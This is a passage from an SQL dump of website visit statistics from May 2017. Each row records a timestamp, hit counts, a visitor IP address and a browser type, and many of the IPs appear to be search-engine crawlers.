'66.249.76.108',''),(113042,1495422632,2,0,2,0,'66.249.66.182',''),(113043,1495422634,1,0,1,0,'66.249.76.89',''),(113044,1495422638,1,0,1,0,'66.249.76.91',''),(113045,1495422760,1,1,0,0,'40.77.167.53','other'),(113046,1495423150,1,0,1,0,'66.249.76.93',''),(113047,1495423366,1,0,1,0,'66.249.66.185',''),(113048,1495423961,1,1,0,0,'164.132.161.85','other'),(113049,1495423963,1,1,0,0,'8.29.198.25','other'),(113050,1495423971,1,1,0,0,'217.182.132.156','other'),(113051,1495423983,1,1,0,0,'217.69.136.203','other'),(113052,1495424822,1,1,0,0,'164.132.161.3','other'),(113053,1495425120,1,1,0,0,'164.132.161.18','other'),(113054,1495425136,1,1,0,0,'51.255.65.39','other'),(113055,1495425215,1,1,0,0,'188.244.33.208','msie'),(113056,1495425246,1,1,0,0,'51.255.65.19','other'),(113057,1495425315,1,1,0,0,'217.69.133.240','other'),(113058,1495425672,1,0,1,0,'66.249.66.197',''),(113059,1495426372,1,1,0,0,'217.69.133.249','other'),(113060,1495426480,1,1,0,0,'137.74.207.119','other'),(113061,1495426579,1,1,0,0,'95.221.228.243','msie'),(113062,1495427162,1,1,0,0,'51.255.65.9','other'),(113063,1495427243,1,1,0,0,'137.74.207.101','other'),(113064,1495427297,1,1,0,0,'217.69.133.238','other'),(113065,1495427470,1,1,0,0,'217.182.132.178','other'),(113066,1495427688,1,0,1,0,'66.249.66.188',''),(113067,1495427716,1,0,1,0,'66.249.76.91',''),(113068,1495427742,1,1,0,0,'217.182.132.6','other'),(113069,1495427878,1,1,0,0,'217.69.133.253','other'),(113070,1495427880,1,1,0,0,'217.69.133.252','other'),(113071,1495428018,1,1,0,0,'217.69.136.209','other'),(113072,1495428064,1,1,0,0,'217.182.132.152','other'),(113073,1495428204,1,0,1,0,'66.249.76.109',''),(113074,1495428463,1,0,1,0,'66.249.76.93',''),(113075,1495428479,1,1,0,0,'91.196.178.70','firefox'),(113076,1495428593,1,1,0,0,'217.182.132.5','other'),(113077,1495428827,1,1,0,0,'157.55.39.152','other'),(113078,1495429062,1,1,0,0,'164.132.161.35','other'),(113079,1495429190,1,1,0,0,'217.182.132.171','other'),(113080,1495429228,1,1,0,0,'217.69.133.230','other'),(113081,1495429601,1,0,1,0,'66.249.76.108',''),(113082,1495430114,1,1,0,0,'163.172.30.231','chrome'),(113083,1495430333,1,1,0,0,'51.255.65.12','other'),(113084,1495430347,60,60,0,0,'218.85.102.110','other'),(113085,1495430366,1,0,1,0,'66.249.66.202',''),(113086,1495430573,1,1,0,0,'51.255.64.106','other'),(113087,1495430621,1,1,0,0,'51.255.65.97','other'),(113088,1495430637,1,1,0,0,'164.132.161.94','other'),(113089,1495430703,1,1,0,0,'217.182.132.16','other'),(113090,1495430741,1,1,0,0,'164.132.161.52','other'),(113091,1495430934,1,0,1,0,'66.249.76.89',''),(113092,1495430938,2,0,2,0,'66.249.66.185',''),(113093,1495431059,1,1,0,0,'51.255.65.95','other'),(113094,1495431308,1,1,0,0,'51.255.65.3','other'),(113095,1495431325,1,1,0,0,'157.55.39.135','other'),(113096,1495431377,1,1,0,0,'164.132.161.78','other'),(113097,1495431492,1,1,0,0,'217.182.132.156','other'),(113098,1495431926,1,1,0,0,'217.182.132.240','other'),(113099,1495432171,1,1,0,0,'217.182.132.58','other'),(113100,1495432990,1,1,0,0,'40.77.167.53','other'),(113101,1495433091,1,1,0,0,'91.196.178.65','firefox'),(113102,1495433227,1,0,1,0,'66.249.66.188',''),(113103,1495433253,1,0,1,0,'66.249.66.182',''),(113104,1495433420,4,4,0,0,'69.30.234.2','other'),(113105,1495433445,1,1,0,0,'217.69.133.2','other'),(113106,1495433481,1,1,0,0,'157.55.39.135','other'),(113107,1495433593,1,1,0,0,'91.196.178.163','chrome'),(113108,1495434010,1,1,0,0,'91.196.178.34','chrome'),(113109,1495434263,2,2,0,0,'46.200.75.98','chrome'),(113110,1495434553,1,1,0,0,'217.69.133.13','other'),(113111,1495434701,1,1,0,0,'217.182.132.73','other'),(113112,1495434723,1,1,0,0,'66.249.66.210','chrome'),(113113,1495434798,1,1,0,0,'8.29.198.25','other'),(113114,1495434986,1,0,1,0,'66.249.76.107',''),(113115,1495435169,1,1,0,0,'51.255.65.17','other'),(113116,1495435193,1,1,0,0,'164.132.161.84','other'),(113117,1495435621,1,1,0,0,'91.196.178.71','chrome'),(113118,1495435622,1,1,0,0,'217.182.132.187','other'),(113119,1495435652,1,1,0,0,'163.172.30.231','chrome'),(113120,1495436019,1,0,1,0,'66.249.76.91',''),(113121,1495436022,1,0,1,0,'66.249.76.93',''),(113122,1495436029,1,0,1,0,'66.249.76.89',''),(113123,1495436036,1,0,1,0,'66.249.66.182',''),(113124,1495436483,1,1,0,0,'40.77.167.95','other'),(113125,1495436502,1,0,1,0,'68.180.230.48',''),(113126,1495436664,1,1,0,0,'66.102.9.27','chrome'),(113127,1495436963,1,1,0,0,'217.182.132.170','other'),(113128,1495437236,1,1,0,0,'217.182.132.180','other'),(113129,1495437408,1,1,0,0,'217.182.132.62','other'),(113130,1495437444,1,0,1,0,'66.249.66.185',''),(113131,1495437485,1,1,0,0,'46.133.231.164','chrome'),(113132,1495437504,2,0,2,0,'66.249.76.89',''),(113133,1495437514,1,0,1,0,'66.249.66.197',''),(113134,1495437707,1,1,0,0,'51.255.65.23','other'),(113135,1495437773,1,0,1,0,'68.180.230.48',''),(113136,1495437900,1,0,1,0,'66.249.76.107',''),(113137,1495438142,1,1,0,0,'217.182.132.188','other'),(113138,1495438223,1,0,1,0,'66.249.76.109',''),(113139,1495438256,1,1,0,0,'91.196.178.68','firefox'),(113140,1495438794,1,0,1,0,'66.249.66.188',''),(113141,1495438951,1,1,0,0,'91.196.178.68','chrome'),(113142,1495439163,1,1,0,0,'217.182.132.93','other'),(113143,1495439361,1,1,0,0,'217.182.132.76','other'),(113144,1495439570,1,1,0,0,'217.182.132.52','other'),(113145,1495439594,1,1,0,0,'137.74.207.108','other'),(113146,1495439851,1,0,1,0,'66.249.66.185',''),(113147,1495439904,1,1,0,0,'95.132.52.228','firefox'),(113148,1495439942,1,1,0,0,'91.196.178.65','firefox'),(113149,1495440023,1,1,0,0,'51.255.65.36','other'),(113150,1495440190,1,1,0,0,'51.255.71.119','other'),(113151,1495440306,1,1,0,0,'217.69.133.191','other'),(113152,1495440307,1,1,0,0,'217.69.133.252','other'),(113153,1495440476,1,1,0,0,'78.111.185.14','firefox'),(113154,1495440632,1,0,1,0,'66.249.66.202',''),(113155,1495440686,1,1,0,0,'217.23.11.65','chrome'),(113156,1495440703,1,1,0,0,'164.132.161.24','other'),(113157,1495440900,1,1,0,0,'164.132.161.49','other'),(113158,1495440914,1,1,0,0,'40.77.167.95','other'),(113159,1495441015,1,1,0,0,'141.8.142.154','other'),(113160,1495441019,1,1,0,0,'95.108.179.15','other'),(113161,1495441102,2,2,0,0,'94.153.228.254','chrome'),(113162,1495441256,2,0,2,0,'66.249.76.89',''),(113163,1495441354,1,1,0,0,'176.195.115.139','msie'),(113164,1495441576,1,1,0,0,'176.193.142.91','other'),(113165,1495441616,1,1,0,0,'164.132.161.13','other'),(113166,1495441847,1,0,1,0,'66.249.76.109',''),(113167,1495441911,1,1,0,0,'217.182.132.181','other'),(113168,1495441967,1,1,0,0,'217.182.132.74','other'),(113169,1495442074,1,1,0,0,'164.132.161.84','other'),(113170,1495442075,1,1,0,0,'217.182.132.57','other'),(113171,1495442214,1,1,0,0,'217.182.132.30','other'),(113172,1495442424,1,1,0,0,'51.255.71.127','other'),(113173,1495442486,1,1,0,0,'217.23.11.65','chrome'),(113174,1495442556,1,1,0,0,'164.132.161.30','other'),(113175,1495442742,1,1,0,0,'194.105.137.166','chrome'),(113176,1495443099,1,1,0,0,'92.112.248.216','chrome'),(113177,1495443228,1,0,1,0,'66.249.76.91',''),(113178,1495443246,2,0,2,0,'66.249.76.109',''),(113179,1495443371,2,0,2,0,'66.249.76.89',''),(113180,1495443385,1,1,0,0,'51.255.65.48','other'),(113181,1495443389,1,0,1,0,'66.249.66.185',''),(113182,1495443720,1,1,0,0,'180.76.15.143','other'),(113183,1495443746,1,0,1,0,'66.249.76.107',''),(113184,1495444080,1,1,0,0,'51.255.65.83','other'),(113185,1495444286,1,1,0,0,'217.23.11.65','chrome'),(113186,1495444638,1,1,0,0,'217.69.133.216','other'),(113187,1495445057,1,1,0,0,'217.69.133.190','other'),(113188,1495445092,1,1,0,0,'217.182.132.23','other'),(113189,1495445129,2,0,2,0,'66.249.76.107',''),(113190,1495445138,1,0,1,0,'66.249.76.93',''),(113191,1495445149,1,0,1,0,'66.249.76.89',''),(113192,1495445371,1,1,0,0,'217.182.132.241','other'),(113193,1495445628,1,1,0,0,'8.29.198.27','other'),(113194,1495445660,1,1,0,0,'157.55.39.135','other'),(113195,1495445760,2,2,0,0,'91.196.178.68','chrome'),(113196,1495446086,1,1,0,0,'217.23.11.65','chrome'),(113197,1495446129,1,0,1,0,'66.249.76.89',''),(113198,1495446228,2,0,2,0,'66.249.66.182',''),(113199,1495446233,1,1,0,0,'46.219.245.102','chrome'),(113200,1495446244,1,0,1,0,'66.249.66.188',''),(113201,1495446441,1,0,1,0,'66.249.66.185',''),(113202,1495446624,1,0,1,0,'66.249.76.109',''),(113203,1495446802,1,1,0,0,'217.69.133.3','other'),(113204,1495447275,2,2,0,0,'164.132.161.48','other'),(113205,1495447328,1,0,1,0,'66.249.66.182',''),(113206,1495447346,1,0,1,0,'66.249.76.89',''),(113207,1495447414,1,1,0,0,'91.196.178.72','chrome'),(113208,1495447437,1,1,0,0,'51.255.65.92','other'),(113209,1495447776,1,1,0,0,'178.154.189.3','other'),(113210,1495447780,1,1,0,0,'95.108.179.15','other'),(113211,1495447886,1,1,0,0,'217.23.11.65','chrome'),(113212,1495448005,1,1,0,0,'95.132.36.207','chrome'),(113213,1495448524,1,1,0,0,'51.255.65.60','other'),(113214,1495448565,1,1,0,0,'217.69.133.253','other'),(113215,1495448930,1,1,0,0,'93.74.212.147','firefox'),(113216,1495448992,1,1,0,0,'66.249.76.60','chrome'),(113217,1495449267,1,1,0,0,'217.69.133.241','other'),(113218,1495449270,1,1,0,0,'40.77.167.95','other'),(113219,1495449454,1,1,0,0,'217.182.132.58','other'),(113220,1495449563,1,1,0,0,'51.255.65.82','other'),(113221,1495449580,1,1,0,0,'51.255.65.32','other'),(113222,1495449604,1,1,0,0,'217.69.133.225','other'),(113223,1495449623,1,1,0,0,'217.182.132.29','other'),(113224,1495449686,1,1,0,0,'217.23.11.65','chrome'),(113225,1495449894,1,1,0,0,'217.69.133.218','other'),(113226,1495450935,1,1,0,0,'137.74.207.110','other'),(113227,1495450972,1,0,1,0,'66.249.66.197',''),(113228,1495451487,1,1,0,0,'109.236.81.160','chrome'),(113229,1495452231,1,1,0,0,'92.112.248.216','chrome'),(113230,1495452413,1,0,1,0,'66.249.76.153',''),(113231,1495452420,1,1,0,0,'217.182.132.147','other'),(113232,1495452422,1,0,1,0,'66.249.66.185',''),(113233,1495452715,1,1,0,0,'164.132.161.48','other'),(113234,1495452722,1,0,1,0,'66.249.76.155',''),(113235,1495452844,1,1,0,0,'164.132.161.66','other'),(113236,1495452971,1,1,0,0,'217.69.133.252','other'),(113237,1495453286,1,1,0,0,'109.236.81.160','chrome'),(113238,1495453791,1,1,0,0,'217.182.132.78','other'),(113239,1495453882,1,1,0,0,'164.132.161.92','other'),(113240,1495453927,1,1,0,0,'51.255.65.30','other'),(113241,1495454468,1,1,0,0,'217.69.133.234','other'),(113242,1495454633,1,1,0,0,'217.69.133.228','other'),(113243,1495454721,1,0,1,0,'66.249.76.153',''),(113244,1495454913,1,0,1,0,'66.249.66.185',''),(113245,1495454919,1,0,1,0,'66.249.66.197',''),(113246,1495454932,2,0,2,0,'66.249.76.155',''),(113247,1495455001,1,1,0,0,'164.132.161.17','other'),(113248,1495455077,1,0,1,0,'66.249.66.188',''),(113249,1495455396,1,1,0,0,'217.69.133.219','other'),(113250,1495456008,1,0,1,0,'66.249.76.62',''),(113251,1495456108,1,1,0,0,'164.132.161.42','other'),(113252,1495456217,1,1,0,0,'107.21.1.8','other'),(113253,1495456455,1,1,0,0,'8.29.198.27','other'),(113254,1495456565,1,1,0,0,'217.182.132.193','other'),(113255,1495456793,1,1,0,0,'91.196.178.37','firefox'),(113256,1495456891,1,1,0,0,'157.55.39.135','other'),(113257,1495457036,1,1,0,0,'91.196.178.70','chrome'),(113258,1495457222,1,1,0,0,'37.54.19.165','firefox'),(113259,1495458591,2,2,0,0,'199.58.86.209','other'),(113260,1495458808,1,0,1,0,'66.249.76.157',''),(113261,1495458817,1,1,0,0,'217.69.133.247','other'),(113262,1495459065,1,1,0,0,'91.196.178.65','firefox'),(113263,1495459366,1,0,1,0,'68.180.230.48',''),(113264,1495459718,1,0,1,0,'66.249.76.60',''),(113265,1495459803,1,1,0,0,'91.196.178.68','chrome'),(113266,1495459808,1,1,0,0,'217.69.133.67','other'),(113267,1495459854,1,1,0,0,'91.196.178.163','chrome'),(113268,1495460322,1,1,0,0,'31.43.3.27','chrome'),(113269,1495460416,1,0,1,0,'68.180.230.48',''),(113270,1495461134,1,0,1,0,'66.249.66.188',''),(113271,1495461144,1,0,1,0,'66.249.76.155',''),(113272,1495461153,1,0,1,0,'66.249.66.182',''),(113273,1495462645,1,0,1,0,'66.249.76.60',''),(113274,1495463886,1,0,1,0,'66.249.76.60',''),(113275,1495463985,1,0,1,0,'66.249.66.188',''),(113276,1495464000,2,0,2,0,'66.249.66.185',''),(113277,1495464560,1,0,1,0,'66.249.76.153',''),(113278,1495464563,1,0,1,0,'66.249.66.182',''),(113279,1495464805,2,0,2,0,'66.249.76.155',''),(113280,1495465046,1,0,1,0,'66.249.66.188',''),(113281,1495465423,1,1,0,0,'92.113.126.248','chrome'),(113282,1495465679,1,1,0,0,'130.180.211.33','chrome'),(113283,1495466407,1,1,0,0,'163.172.30.231','chrome'),(113284,1495466532,1,0,1,0,'68.180.230.48',''),(113285,1495466781,1,0,1,0,'66.249.66.182',''),(113286,1495467281,1,1,0,0,'8.29.198.26','other'),(113287,1495467410,1,1,0,0,'217.69.133.6','other'),(113288,1495468056,1,1,0,0,'217.69.133.241','other'),(113289,1495468101,1,1,0,0,'66.249.76.62','chrome'),(113290,1495468416,1,0,1,0,'66.249.76.153',''),(113291,1495468982,1,1,0,0,'217.69.133.219','other'),(113292,1495469252,2,2,0,0,'91.209.11.236','other'),(113293,1495469444,1,1,0,0,'92.113.126.248','chrome'),(113294,1495470154,1,1,0,0,'66.249.76.45','chrome'),(113295,1495470990,1,1,0,0,'46.133.138.254','chrome'),(113296,1495471443,1,0,1,0,'66.249.76.60',''),(113297,1495471934,1,1,0,0,'217.69.136.207','other'),(113298,1495472159,1,1,0,0,'217.69.133.3','other'),(113299,1495472160,1,1,0,0,'217.69.133.4','other'),(113300,1495472556,1,1,0,0,'217.69.133.60','other'),(113301,1495472990,1,1,0,0,'163.172.30.231','chrome'),(113302,1495473321,1,0,1,0,'66.249.66.202',''),(113303,1495473684,1,1,0,0,'91.196.178.70','firefox'),(113304,1495473695,1,0,1,0,'66.249.76.45',''),(113305,1495473699,1,0,1,0,'66.249.76.155',''),(113306,1495473704,1,0,1,0,'66.249.76.61',''),(113307,1495473712,1,0,1,0,'66.249.66.185',''),(113308,1495473724,1,0,1,0,'66.249.66.182',''),(113309,1495474605,1,0,1,0,'66.249.76.137',''),(113310,1495474691,1,1,0,0,'46.200.46.94','chrome'),(113311,1495474761,1,1,0,0,'66.249.76.62','chrome'),(113312,1495475745,1,1,0,0,'217.69.133.60','other'),(113313,1495476054,1,0,1,0,'66.249.76.157',''),(113314,1495476061,1,1,0,0,'40.77.167.95','other'),(113315,1495476186,1,1,0,0,'66.249.76.60','chrome'),(113316,1495476639,1,0,1,0,'68.180.230.48',''),(113317,1495476775,1,1,0,0,'40.77.167.53','other'),(113318,1495477201,2,2,0,0,'91.209.11.236','other'),(113319,1495477387,1,0,1,0,'66.249.76.62',''),(113320,1495477467,1,0,1,0,'66.249.76.153',''),(113321,1495477666,1,0,1,0,'68.180.230.48',''),(113322,1495477695,1,0,1,0,'66.249.66.210',''),(113323,1495478107,1,1,0,0,'8.29.198.25','other'),(113324,1495478327,1,1,0,0,'217.69.133.243','other'),(113325,1495478329,1,1,0,0,'217.69.133.246','other'),(113326,1495479792,1,1,0,0,'217.69.133.228','other'),(113327,1495480398,1,1,0,0,'217.69.133.247','other'),(113328,1495480698,1,1,0,0,'157.55.39.135','other'),(113329,1495480707,1,1,0,0,'157.55.39.152','other'),(113330,1495481364,1,0,1,0,'66.249.76.61',''),(113331,1495483219,4,0,4,0,'66.249.66.197',''),(113332,1495483579,1,0,1,0,'66.249.76.60',''),(113333,1495483725,3,0,3,0,'66.249.66.202',''),(113334,1495483740,1,0,1,0,'66.249.76.153',''),(113335,1495483745,1,0,1,0,'66.249.76.61',''),(113336,1495483754,1,0,1,0,'66.249.66.182',''),(113337,1495483861,1,0,1,0,'66.249.66.210',''),(113338,1495483942,4,0,4,0,'66.249.66.188',''),(113339,1495483946,1,0,1,0,'66.249.66.185',''),(113340,1495483948,2,0,2,0,'66.249.76.45',''),(113341,1495483987,1,0,1,0,'68.180.230.48',''),(113342,1495484015,1,1,0,0,'66.249.76.45','chrome'),(113343,1495484361,1,1,0,0,'91.196.178.165','chrome'),(113344,1495484726,1,1,0,0,'180.76.15.150','other'),(113345,1495484826,1,0,1,0,'66.249.76.46',''),(113346,1495485007,1,1,0,0,'217.69.133.29','other'),(113347,1495485213,1,0,1,0,'66.249.76.47',''),(113348,1495485232,3,0,3,0,'66.249.76.61',''),(113349,1495485239,1,0,1,0,'66.249.66.182',''),(113350,1495485839,1,0,1,0,'66.249.66.185',''),(113351,1495485960,1,0,1,0,'66.249.66.202',''),(113352,1495485974,1,0,1,0,'66.249.76.157',''),(113353,1495486242,1,1,0,0,'217.69.133.192','other'),(113354,1495486350,1,1,0,0,'217.69.133.251','other'),(113355,1495487430,1,0,1,0,'66.249.66.197',''),(113356,1495488278,1,1,0,0,'207.241.231.171','other'),(113357,1495488283,1,1,0,0,'91.209.11.236','other'),(113358,1495488380,1,0,1,0,'66.249.76.153',''),(113359,1495488557,1,1,0,0,'217.69.133.235','other'),(113360,1495488703,2,0,2,0,'66.249.76.61',''),(113361,1495488822,1,0,1,0,'66.249.76.60',''),(113362,1495488932,1,1,0,0,'8.29.198.25','other'),(113363,1495489180,1,1,0,0,'207.241.231.171','other'),(113364,1495489856,1,0,1,0,'66.249.76.60',''),(113365,1495490107,1,0,1,0,'66.249.76.62',''),(113366,1495490893,1,1,0,0,'217.182.132.193','other'),(113367,1495490930,1,1,0,0,'164.132.161.7','other'),(113368,1495491049,1,1,0,0,'217.182.132.33','other'),(113369,1495491871,1,1,0,0,'157.55.39.152','other'),(113370,1495491890,1,1,0,0,'217.182.132.53','other'),(113371,1495492226,1,1,0,0,'217.182.132.149','other'),(113372,1495492312,1,0,1,0,'66.249.76.62',''),(113373,1495492948,1,0,1,0,'66.249.76.131',''),(113374,1495493182,1,1,0,0,'151.80.27.116','other'),(113375,1495493189,1,0,1,0,'66.249.66.197',''),(113376,1495493735,1,1,0,0,'164.132.164.180','other'),(113377,1495494056,1,1,0,0,'217.69.133.244','other'),(113378,1495494490,2,0,2,0,'66.249.76.60',''),(113379,1495494493,1,0,1,0,'66.249.66.182',''),(113380,1495494498,1,0,1,0,'66.249.66.185',''),(113381,1495494502,1,0,1,0,'66.249.76.153',''),(113382,1495494941,1,1,0,0,'217.182.132.71','other'),(113383,1495494951,1,0,1,0,'66.249.76.155',''),(113384,1495495051,1,1,0,0,'217.182.132.33','other'),(113385,1495495140,1,1,0,0,'37.204.43.143','msie'),(113386,1495495861,1,0,1,0,'66.249.76.60',''),(113387,1495496457,1,1,0,0,'217.69.133.60','other'),(113388,1495496816,1,1,0,0,'54.165.59.7','other'),(113389,1495497230,1,0,1,0,'66.249.76.61',''),(113390,1495497412,1,1,0,0,'51.255.65.73','other'),(113391,1495497566,1,1,0,0,'164.132.161.41','other'),(113392,1495497811,1,1,0,0,'40.77.167.95','other'),(113393,1495497942,1,1,0,0,'217.69.133.2','other'),(113394,1495497992,1,1,0,0,'51.255.65.12','other'),(113395,1495498072,1,1,0,0,'95.108.213.34','other'),(113396,1495498076,1,1,0,0,'141.8.142.15','other'),(113397,1495498127,1,1,0,0,'217.182.132.58','other'),(113398,1495498171,1,1,0,0,'51.255.65.20','other'),(113399,1495498232,1,1,0,0,'217.182.132.5','other'),(113400,1495498363,1,1,0,0,'217.182.132.175','other'),(113401,1495498486,1,1,0,0,'137.74.207.170','other'),(113402,1495498704,1,1,0,0,'51.255.65.10','other'),(113403,1495498822,1,1,0,0,'164.132.162.164','other'),(113404,1495499085,1,1,0,0,'164.132.161.17','other'),(113405,1495499113,1,1,0,0,'217.69.133.250','other'),(113406,1495499323,1,1,0,0,'51.255.71.98','other'),(113407,1495499550,1,1,0,0,'164.132.161.75','other'),(113408,1495499682,1,1,0,0,'51.255.65.13','other'),(113409,1495499752,1,1,0,0,'8.29.198.27','other'),(113410,1495500545,1,1,0,0,'164.132.161.93','other'),(113411,1495501129,1,1,0,0,'164.132.161.21','other'),(113412,1495501370,1,0,1,0,'66.249.66.182',''),(113413,1495501371,1,1,0,0,'164.132.161.17','other'),(113414,1495501373,1,0,1,0,'66.249.76.153',''),(113415,1495501413,1,1,0,0,'217.182.132.150','other'),(113416,1495502382,1,1,0,0,'217.182.132.190','other'),(113417,1495502544,1,1,0,0,'51.255.65.57','other'),(113418,1495502783,1,1,0,0,'51.255.65.6','other'),(113419,1495503436,1,1,0,0,'217.69.133.236','other'),(113420,1495503447,1,1,0,0,'217.182.132.57','other'),(113421,1495503898,1,0,1,0,'66.249.76.60',''),(113422,1495504000,1,0,1,0,'66.249.66.188',''),(113423,1495504662,1,1,0,0,'217.69.133.246','other'),(113424,1495504737,1,1,0,0,'217.69.133.232','other'),(113425,1495504903,1,1,0,0,'217.69.133.250','other'),(113426,1495505462,1,0,1,0,'68.180.230.48',''),(113427,1495506258,1,1,0,0,'180.76.15.162','other'),(113428,1495506791,1,0,1,0,'66.249.76.61',''),(113429,1495507467,1,0,1,0,'66.249.76.60',''),(113430,1495507786,1,1,0,0,'40.77.167.53','other'),(113431,1495508365,1,1,0,0,'51.255.65.95','other'),(113432,1495508417,1,1,0,0,'82.145.222.195','other'),(113433,1495508450,1,0,1,0,'66.249.76.155',''),(113434,1495508656,1,0,1,0,'66.249.76.157',''),(113435,1495508729,1,0,1,0,'66.249.66.185',''),(113436,1495508797,1,1,0,0,'51.255.65.62','other'),(113437,1495508846,1,1,0,0,'217.182.132.157','other'),(113438,1495509083,1,1,0,0,'217.69.133.249','other'),(113439,1495509206,1,1,0,0,'217.182.132.24','other'),(113440,1495510187,1,0,1,0,'66.249.76.61',''),(113441,1495510263,1,1,0,0,'217.182.132.150','other'),(113442,1495510268,1,1,0,0,'51.255.65.7','other'),(113443,1495510399,1,1,0,0,'217.69.133.232','other'),(113444,1495510584,1,1,0,0,'8.29.198.26','other'),(113445,1495510858,1,0,1,0,'66.249.76.60',''),(113446,1495510875,1,0,1,0,'66.249.66.182',''),(113447,1495510877,1,0,1,0,'66.249.66.210',''),(113448,1495511104,1,1,0,0,'164.132.161.13','other'),(113449,1495511312,1,1,0,0,'95.108.213.34','other'),(113450,1495511513,1,1,0,0,'164.132.161.64','other'),(113451,1495511606,1,1,0,0,'51.255.65.18','other'),(113452,1495511736,1,1,0,0,'217.182.132.191','other'),(113453,1495512003,1,1,0,0,'217.182.132.63','other'),(113454,1495512136,1,1,0,0,'217.182.132.148','other'),(113455,1495512296,1,1,0,0,'141.8.142.15','other'),(113456,1495512307,1,1,0,0,'137.74.207.164','other'),(113457,1495512659,1,0,1,0,'66.249.76.157',''),(113458,1495512690,1,1,0,0,'164.132.161.3','other'),(113459,1495513119,1,1,0,0,'51.255.65.8','other'),(113460,1495513148,1,1,0,0,'164.132.161.86','other'),(113461,1495513197,1,1,0,0,'217.182.132.62','other'),(113462,1495513247,1,1,0,0,'51.255.65.6','other'),(113463,1495513553,1,0,1,0,'66.249.76.155',''),(113464,1495513620,1,1,0,0,'51.255.65.37','other'),(113465,1495513770,1,0,1,0,'66.249.76.61',''),(113466,1495514754,1,1,0,0,'66.249.66.202','chrome'),(113467,1495515023,1,1,0,0,'51.255.71.113','other'),(113468,1495515462,1,1,0,0,'217.69.133.238','other'),(113469,1495515541,1,0,1,0,'66.249.76.153',''),(113470,1495515580,1,1,0,0,'164.132.161.6','other'),(113471,1495515631,1,1,0,0,'217.182.132.175','other'),(113472,1495515757,1,1,0,0,'51.255.71.131','other'),(113473,1495516257,1,1,0,0,'37.73.207.125','other'),(113474,1495516631,1,1,0,0,'51.255.71.117','other'),(113475,1495516909,1,0,1,0,'66.249.66.197',''),(113476,1495517033,1,1,0,0,'91.196.178.66','firefox'),(113477,1495517081,1,1,0,0,'217.182.132.60','other'),(113478,1495517471,1,1,0,0,'217.182.132.188','other'),(113479,1495517994,2,0,2,0,'66.249.76.153',''),(113480,1495518041,2,1,1,0,'66.249.76.155',''),(113481,1495518100,1,0,1,0,'68.180.231.23',''),(113482,1495518114,1,1,0,0,'164.132.161.65','other'),(113483,1495518209,1,1,0,0,'66.249.76.61','chrome'),(113484,1495518233,1,1,0,0,'51.255.65.75','other'),(113485,1495518488,1,1,0,0,'217.182.132.21','other'),(113486,1495519671,1,1,0,0,'51.255.65.12','other'),(113487,1495519886,1,1,0,0,'51.255.71.116','other'),(113488,1495520064,1,1,0,0,'164.132.161.22','other'),(113489,1495520130,1,1,0,0,'164.132.161.27','other'),(113490,1495520358,1,0,1,0,'66.249.66.185',''),(113491,1495520373,1,1,0,0,'217.182.132.188','other'),(113492,1495520748,1,1,0,0,'87.250.224.7','other'),(113493,1495520935,1,1,0,0,'141.8.142.15','other'),(113494,1495521411,1,1,0,0,'8.29.198.25','other'),(113495,1495521669,1,1,0,0,'109.173.62.8','firefox'),(113496,1495521868,1,1,0,0,'51.255.65.88','other'),(113497,1495521941,1,1,0,0,'91.196.178.71','chrome'),(113498,1495522181,1,1,0,0,'91.196.178.68','chrome'),(113499,1495522323,1,0,1,0,'66.249.76.157',''),(113500,1495522837,1,0,1,0,'66.249.76.61',''),(113501,1495523029,1,1,0,0,'217.182.132.188','other'),(113502,1495523183,1,1,0,0,'40.77.167.53','other'),(113503,1495523531,1,0,1,0,'66.249.76.155',''),(113504,1495523830,1,1,0,0,'66.102.9.25','chrome'),(113505,1495524080,1,1,0,0,'137.74.207.120','other'),(113506,1495524202,1,1,0,0,'109.236.81.133','chrome'),(113507,1495524209,1,1,0,0,'109.236.81.168','chrome'),(113508,1495524213,50,50,0,0,'88.198.0.163','other'),(113509,1495524301,1,1,0,0,'51.255.65.16','other'),(113510,1495524658,1,1,0,0,'91.196.178.68','chrome'),(113511,1495524787,1,1,0,0,'217.182.132.178','other'),(113512,1495524848,1,1,0,0,'164.132.161.27','other'),(113513,1495525360,1,1,0,0,'217.182.132.19','other'),(113514,1495525646,2,2,0,0,'195.162.71.207','chrome'),(113515,1495525791,2,2,0,0,'91.209.11.236','other'),(113516,1495526008,1,1,0,0,'109.236.81.168','chrome'),(113517,1495526027,1,1,0,0,'95.132.70.197','firefox'),(113518,1495526129,1,1,0,0,'217.182.132.153','other'),(113519,1495526526,1,0,1,0,'66.249.76.46',''),(113520,1495526597,1,1,0,0,'217.182.132.152','other'),(113521,1495526770,1,1,0,0,'95.135.91.184','other'),(113522,1495527071,1,0,1,0,'66.249.76.62',''),(113523,1495527412,1,1,0,0,'51.255.65.95','other'),(113524,1495527496,1,1,0,0,'91.196.178.167','chrome'),(113525,1495527602,1,1,0,0,'164.132.161.79','other'),(113526,1495527617,1,0,1,0,'66.249.66.188',''),(113527,1495527659,2,0,2,0,'66.249.76.45',''),(113528,1495527793,1,1,0,0,'66.249.76.61','chrome'),(113529,1495527808,1,1,0,0,'109.236.81.168','chrome'),(113530,1495527824,1,1,0,0,'37.55.171.158','other'),(113531,1495528344,2,2,0,0,'95.132.1.26','chrome'),(113532,1495528364,1,1,0,0,'91.196.178.135','firefox'),(113533,1495528559,1,1,0,0,'51.255.65.5','other'),(113534,1495528873,1,1,0,0,'213.108.45.138','chrome'),(113535,1495529110,1,1,0,0,'91.196.178.68','firefox'),(113536,1495529141,1,1,0,0,'164.132.161.69','other'),(113537,1495529195,1,0,1,0,'66.249.76.47',''),(113538,1495529433,1,1,0,0,'95.132.27.95','chrome'),(113539,1495529608,1,1,0,0,'109.236.81.168','chrome'),(113540,1495529762,1,1,0,0,'87.250.224.18','other'),(113541,1495529765,1,1,0,0,'141.8.142.15','other'),(113542,1495530369,1,1,0,0,'217.182.132.24','other'),(113543,1495530405,1,1,0,0,'95.132.27.95','chrome'),(113544,1495530894,1,1,0,0,'51.255.65.91','other'),(113545,1495530971,1,1,0,0,'91.196.177.46','firefox'),(113546,1495531012,1,0,1,0,'66.249.76.60',''),(113547,1495531148,1,1,0,0,'95.108.213.34','other'),(113548,1495531275,1,0,1,0,'66.249.76.135',''),(113549,1495531314,1,0,1,0,'66.249.66.185',''),(113550,1495531365,1,1,0,0,'217.182.132.20','other'),(113551,1495531408,1,1,0,0,'109.236.81.168','chrome'),(113552,1495531422,1,1,0,0,'91.196.178.66','firefox'),(113553,1495531744,1,1,0,0,'130.180.216.55','firefox'),(113554,1495532145,1,1,0,0,'91.196.178.167','chrome'),(113555,1495532238,1,1,0,0,'8.29.198.25','other'),(113556,1495532495,1,1,0,0,'51.255.65.42','other'),(113557,1495532505,1,0,1,0,'66.249.66.188',''),(113558,1495532516,1,0,1,